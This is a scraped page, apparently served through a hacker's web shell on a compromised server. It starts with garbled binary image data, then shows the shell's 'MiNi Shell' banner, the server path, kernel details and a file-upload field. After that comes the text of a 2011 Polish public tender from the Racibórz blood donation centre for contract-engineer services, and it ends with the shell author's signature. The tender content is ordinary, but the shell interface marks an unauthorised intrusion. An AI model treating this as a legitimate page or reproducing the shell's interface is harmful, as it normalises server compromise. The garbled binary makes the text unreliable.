JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110120/24337-N-2011.html

<p class="kh_header"><b>Racibórz: Pełnienie funkcji Inżyniera Kontraktu dla zadania:  Rozbudowa i przebudowa istniejącego budynku Regionalnego Centrum Krwiodawstwa i Krwiolecznictwa w Raciborzu celem poszerzenia jego funkcji medycznych i administracyjnych oraz techniczno-magazynowych - kontynuacja</b><br>
<b>Numer ogłoszenia: 24337 - 2011; data zamieszczenia: 20.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Krwiodawstwa i Krwiolecznictwa , ul. Sienkiewicza 3, 47-400 Racibórz, woj. śląskie, tel. 032 4181592, 4181056, faks 032 4153381.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rckik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Kontraktu dla zadania:  Rozbudowa i przebudowa istniejącego budynku Regionalnego Centrum Krwiodawstwa i Krwiolecznictwa w Raciborzu celem poszerzenia jego funkcji medycznych i administracyjnych oraz techniczno-magazynowych - kontynuacja.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji Inżyniera Kontraktu dla zadania:  Rozbudowa i przebudowa istniejącego budynku Regionalnego Centrum Krwiodawstwa i Krwiolecznictwa w Raciborzu celem poszerzenia jego funkcji medycznych i administracyjnych oraz techniczno-magazynowych - kontynuacja wraz z przejęciem obowiązków od Inżyniera obecnie pełniącego funkcję w ramach niniejszego zadania.
Wartość zadania według już podpisanych umów wynosi brutto 19 236 000  PLN, w tym:
Roboty ogólnobudowlane - 10 792 000 PLN
Roboty instalacje sanitarne, wod-kan, wentylacja,  c.o. -  4 240 000 PLN
Roboty elektryczne - 3 829 000 PLN.
Zadania w ramach niniejszego kontraktu będą obejmować co najmniej następujące czynności:
a).weryfikację wszystkich dotychczas wystawionych przez Inżyniera (inspektorów nadzoru) dokumentów, wprowadzenie korekt, tam gdzie Wykonawca uzna za konieczne i przejęcie odpowiedzialności za jakość i zgodność z zawartymi umowami, wytycznymi instytucji zarządzających oraz obowiązującymi przepisami prawa,
b).Weryfikacja wszystkich dokumentów wystawionych przez podmiot dotychczas pełniący funkcję Inżyniera, wniesienie ewentualnych korekt i wydanie do 7 dni od daty podpisania umowy oświadczenia o przejęciu pełnej odpowiedzialności za wszystkie dokumenty wystawione przez podmiot dotychczas pełniący funkcję Inżyniera.
c).Zapoznanie się z wszystkimi dokumentami kontraktowymi oraz pełną korespondencją dla kontraktów w fazie realizacji, w terminie wydanie do 7 dni od daty podpisania umowy oraz wydanie oświadczenia o zapoznaniu się jw.
d).Przejęcie i wdrożenie wszystkich obowiązujących w ramach Projektu procedur zarządzania Kontraktem na roboty, wzorów dokumentów i ich archiwizacji; oraz wdrożenie dodatkowych (za zgodą Zamawiającego) w przypadku gdy Wykonawca uzna, że procedury takie przyczyniłyby się do podniesienia efektywności zarządzania kontraktami.
e).profesjonalne i kompetentne pełnienie funkcji Inspektora Nadzoru Inwestorskiego nad robotami (zgodnie z art. 25, 26 Prawa Budowlanego),
f).pełnienie funkcji Inwestora Zastępczego (art. 18 Prawa Budowlanego),
g).koordynowanie czynności inspektorów nadzoru inwestorskiego (zgodnie z art. 27 Prawa Budowlanego),
h).pełnienia funkcji Inżyniera zgodnie z wymogami Inwestora i przepisami Prawa Budowlanego.
i).zarządzanie finansowe i administrowanie Kontraktem na roboty (w tym kontrola i zatwierdzanie przejściowych płatności, zatwierdzanie robót dodatkowych i zamiennych mających wpływ na cenę umowy, ustalanie cen/ stawek za dodatkowe roboty oraz zatwierdzanie raportów Wykonawcy),
j).bezstronne i obiektywne uczestniczenie w procesie inwestycyjnym (Inżynier stoi na straży prawidłowo wykonanego kontraktu, zgodnie z jego zapisami oraz obowiązującymi przepisami i zasadami sztuki budowlanej; podejmuje bezstronne decyzje np. w sprawie roszczeń Wykonawcy, wydaje polecenia Wykonawcy zgodnie z zapisami kontraktu),
k).monitoring postępu Kontraktu na roboty łącznie z raportowaniem, biorąc pod uwagę oba wskaźniki: rzeczowy i finansowy,
l).wdrażanie i egzekwowanie programów naprawczych w przypadku opóźnień generowanych przez Wykonawców,
m).przeprowadzenie z Wykonawcą robót odbiorów częściowych i końcowych ze szczególnym uwzględnieniem rozruchów technologicznych,
n).zapewnienie przestrzegania i stosowania polskiego prawa, w tym budowlanego przez Wykonawców,
o).pełnienie funkcji mediatora i rozjemcy w sporach - Inżynier prowadzi polubowne uzgodnienia w przypadku zaistnienia konfliktu pomiędzy Wykonawcą robót a Zamawiającym.
p).przygotowanie dokumentów niezbędnych do prowadzenia kontraktów - Inżynier jest odpowiedzialny za przygotowanie i/lub weryfikację m.in.:
- przejściowych  płatności
- protokołów konieczności i negocjacji,
- raportów miesięcznych z robót,
- protokołów odbioru robót,
- raportu końcowego z realizacji zadania.
q).zapewnienie, że wszystkie zakończone prace są zgodne z technicznymi i formalnymi wymaganiami Kontraktów na roboty (w tym kontrakty zakończone przed przejęciem obowiązków przez Inżyniera);
r).rozliczenie rzeczowe i finansowe Kontraktów na roboty,
s).analizę ryzyka w zakresie nadzorowanych kontraktów,
t).prowadzenie bieżących analiz na potrzeby Zamawiającego, zgodnie z jego wytycznymi,
u).prowadzenie rad budowy w odstępach tygodniowych dla  Kontraktu na roboty, lub częściej w razie wystąpienia takiej potrzeby;
v).stałe konsultacje i doradztwo fachowe dla Zamawiającego, w tym:
- udział w kwalifikacji kosztów (zgodność z Decyzją i Wytycznymi)
- monitorowanie zgodności robót z kontraktem 
- rzetelne raportowanie (nie jest jedynie obserwatorem (fotografia), lecz aktywnym elementem całości) dające wczesną analizę zagrożeń i wnioski w sprawozdaniach miesięcznych
- bieżąca sprawozdawczość na podstawie własnej oceny.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 ustawy, w wysokości do 20%, polegających na powtórzeniu tego samego rodzaju usług.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 0 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże dysponowanie co najmniej  następującymi osobami: 
a). Specjalista kluczowy nr 1, Lider Zespołu Inżynier Kontraktu - posiadający:
Wykształcenie wyższe techniczne. Doświadczenie zawodowe : minimum 10-letnie doświadczenie w kierowaniu budową lub nadzór nad robotami przy minimum 2 zadaniach z zakresu budowy obiektów kubaturowych (tj. budowy lub remontu lub modernizacji, obiektów mieszkalnych lub użyteczności publicznej lub biurowych lub handlowych) o wartości robót powyżej 10 000 000,00 PLN. Przewidywane zaangażowanie Lidera Zespołu  przy realizacji niniejszego zamówienia w wymiarze pełnego etatu, wykonywane na miejscu, w biurze prowadzonym na terenie RCKiK w Raciborzu.
b). Specjalista kluczowy nr 2, Menedżer kosztów - posiadający:
Wykształcenie wyższe techniczne i/lub ekonomiczne; minimum 5-letnie doświadczenie zawodowe, co najmniej 5 lat pracy na stanowisku związanym z rozliczaniem robót budowlano-montażowych w minimum 1 projekcie, o wartości robót co najmniej 10 000 000,00 PLN.  
c). Specjalista kluczowy 3, Inspektor Nadzoru - specjalista w zakresie robót konstrukcyjno-budowlanych:
Wykształcenie wyższe techniczne; doświadczenie zawodowe: minimum 8-letnie doświadczenie w nadzorowaniu robót lub kierowaniu robotami,  przy minimum 1 zadaniu z zakresu budowy obiektów kubaturowych (tj. budowy lub remontu lub modernizacji, obiektów mieszkalnych lub użyteczności publicznej lub biurowych lub handlowych)  o wartości robót powyżej 10 000 000,00 PLN.  
-uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
d). Specjalista kluczowy 4, Inspektor Nadzoru - specjalista w zakresie robót instalacyjnych i sieci sanitarnych, wentylacji - posiadający:
Wykształcenie wyższe techniczne; doświadczenie zawodowe; minimum 5-letnie  doświadczenie w nadzorowaniu robót lub kierowaniu robotami w zakresie robót  instalacyjnych i sieci sanitarnych oraz wentylacji.   
-uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjno-inżynieryjnej w zakresie sieci i instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych,  lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
e). Specjalista kluczowy 5, Inspektor Nadzoru - specjalista w zakresie robót    sieci, instalacji, urządzeń elektrycznych - posiadający:
-Wykształcenie wyższe techniczne; minimum 5-letnie doświadczenie zawodowe  w nadzorowaniu robót elektrycznych  lub kierowaniu robotami elektrycznymi.
-uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony przewidują zmiany niniejszej umowy w następujących sytuacjach:

1). Zmiany mające wpływ termin wykonania: W przypadku zmiany terminu wykonania zadania związanego z umową zawartą z Wykonawcą na wykonanie robót budowlanych określonych w § 9 umowy ( tj.
a). możliwe jest przedłużenie terminu zakończenia umowy o czas opóźnienia, jeżeli opóźnienie to wynika z przyczyn leżących po stronie Zamawiającego i jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy, w zakresie następujących obowiązków Zamawiającego:
-  przekazanie terenu budowy,
-  przekazanie dokumentów budowy,
b)  możliwa jest zmiana terminu wykonania umowy, wstrzymania i wznowienia  robót, ze względu na:
- oczekiwanie Wykonawcy na niezbędne opinie, decyzje, zezwolenia,  uzgodnienia itp. wymagane obowiązującymi przepisami prawa, o ile okres wyczekiwania Wykonawcy nie wynika z braku podjęcia niezwłocznie lub wadliwego wykonywania przez Wykonawcę czynności niezbędnych do zainicjowania oraz prawidłowego przeprowadzenia właściwego postępowania celem uzyskania wskazanych powyżej niezbędnych  opinii, decyzji, zezwoleń, uzgodnień itp.,
-  roboty dodatkowe,
-  zmiany stanu prawnego mającej wpływ na realizację zadania.
2). Zmiany mające wpływ na wysokość wynagrodzenia:
a). zmiana stawki podatku od towarów i usług (VAT),
b). rezygnacja z  części robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rckik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Krwiodawstwa i Krwiolecznictwa w Raciborzu, ul. Sienkiewicza 3, 47-400 Racibórz, pok. 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2011 godzina 11:30, miejsce: Regionalne Centrum Krwiodawstwa i Krwiolecznictwa w Raciborzu, ul. Sienkiewicza 3, 47-400 Racibórz, pok. 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com